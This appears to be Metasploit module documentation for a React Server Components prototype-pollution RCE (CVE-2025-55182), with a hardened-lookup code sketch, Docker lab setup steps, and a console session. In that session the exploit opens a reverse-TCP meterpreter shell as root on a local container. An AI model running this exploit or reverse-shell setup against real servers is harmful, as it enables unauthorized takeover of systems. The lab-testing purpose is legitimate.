Vulnerable Application
A critical unauthenticated Remote Code Execution (RCE) vulnerability exists in the React Server Components (RSC) Flight protocol. The vulnerability allows attackers to achieve prototype pollution during deserialization of RSC payloads by sending specially crafted multipart requests with "__proto__", "constructor", or "prototype" as module names.
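The class of lookup weakness described above, shown beside a hardened form, as an added example that is not code from React or from this module. The function names, the `RESERVED` set and `sampleModule` are hypothetical, and the sketch assumes a request-supplied name is used to pick a member of a module's exports object.

```javascript
// Added example: a simplified model of resolving a named export during
// deserialization. All names here are hypothetical, not React's own code.

// The three names called out in the description above.
const RESERVED = new Set(["__proto__", "constructor", "prototype"]);

// Constructed sample: a module that exports a single function.
const sampleModule = { greet: (name) => `hello ${name}` };

// Weak form: plain property access walks the prototype chain, so a name
// taken from the request can reach members the module never exported.
function resolveExportUnsafe(moduleExports, name) {
  return moduleExports[name];
}

// Hardened form: accept only own, non-reserved string keys.
function resolveExportSafe(moduleExports, name) {
  if (typeof name !== "string" || RESERVED.has(name)) {
    throw new TypeError(`rejected export name: ${String(name)}`);
  }
  if (!Object.prototype.hasOwnProperty.call(moduleExports, name)) {
    throw new TypeError(`unknown export: ${name}`);
  }
  return moduleExports[name];
}

// Compare both resolvers for one requested name.
function classify(name) {
  const value = resolveExportUnsafe(sampleModule, name);
  const own = Object.prototype.hasOwnProperty.call(sampleModule, name);
  let safe = "resolved";
  try {
    resolveExportSafe(sampleModule, name);
  } catch (err) {
    safe = "rejected";
  }
  // unsafeReturnedInherited: the weak lookup handed back something that
  // came from the prototype chain rather than from the module itself.
  return { name, unsafeReturnedInherited: value !== undefined && !own, safe };
}

// One legitimate name, the three reserved names, and one other inherited name.
function demo() {
  return ["greet", "__proto__", "constructor", "prototype", "toString"].map(classify);
}
```

Only `greet` passes the hardened resolver; `toString` shows why an own-property check is needed in addition to the reserved-name list.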
Testing
- Open the data\exploits\react2shell_cve_2025_55182 directory
- Build
docker build -t react2shell .
- Run
docker run -p 3000:3000 react2shell
- Open http://127.0.0.1:3000/ and make sure the app is available
Scenario
msf6 > use multi/http/react2shell_cve_2025_55182_scanner
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(multi/http/react2shell_cve_2025_55182) > set RHOSTS 172.17.0.1
RHOSTS => 172.17.0.1
msf6 exploit(multi/http/react2shell_cve_2025_55182) > set RPORT 3000
RPORT => 3000
msf6 exploit(multi/http/react2shell_cve_2025_55182) > set LPORT 6666
LPORT => 6666
msf6 exploit(multi/http/react2shell_cve_2025_55182) > set FETCH_SRVPORT 8081
FETCH_SRVPORT => 8081
msf6 exploit(multi/http/react2shell_cve_2025_55182) > run
[*] Started reverse TCP handler on 172.17.0.1:6666
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Sending stage (3045380 bytes) to 172.17.0.2
[*] Meterpreter session 4 opened (172.17.0.1:6666 -> 172.17.0.2:59608) at 2025-12-05 01:12:48 -0500
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : 172.17.0.2
OS : (Linux 6.11.2-amd64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux